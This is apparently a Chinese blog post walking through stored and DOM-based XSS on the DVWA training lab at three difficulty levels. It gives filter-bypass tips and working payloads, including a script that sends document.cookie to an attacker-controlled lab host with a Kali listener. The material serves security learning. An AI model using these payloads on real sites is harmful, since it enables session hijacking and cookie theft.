DVWA-存储型xss

存储型:

低:

输入 <script>alert('XSS stored')</script>

存储型XSS是长期存储在服务器端,每次访问时都会执行js脚本

<script οnlοad=alert('XSS1')>

<a href=https://www.baidu.com>登录</a>3

<script>new Image().src="http://192.168.208.133/c.php?output="+document.cookie;</script>

Kali监听

 <script>alert(document.cookie)</script>

中:

可以使用大小写或者复写绕过

后面的操作与low级别一致

高:

限制了<script>标签,但没有限制娶她标签,可以更换标签进行绕过

DOM型:

低:

没有任何过滤

http://192.168.208.137/dvwa/vulnerabilities/xss_d/?default=%3Cscript%3Ealert(%27XSS-DOM-LOW%27)%3C/script%3E

中:

检查了参数是否为空,限制了<script>

http://192.168.208.137/dvwa/vulnerabilities/xss_d/?default=English%3E/option%3E%3C/select%3E%3Cimg%20src=1%20οnerrοr=alert(%27XSS-DOM-MEDIUM%27)%3E

高:

 

http://192.168.208.137/dvwa/vulnerabilities/xss_d/?default=English#%3Cscript%3Ealert(/XSS-DOM-HIGH/)%3C/script%3E

 

 

 

发布了49 篇原创文章 · 获赞 3 · 访问量 440

猜你喜欢

转载自blog.csdn.net/baidu_39086634/article/details/105420521
今日推荐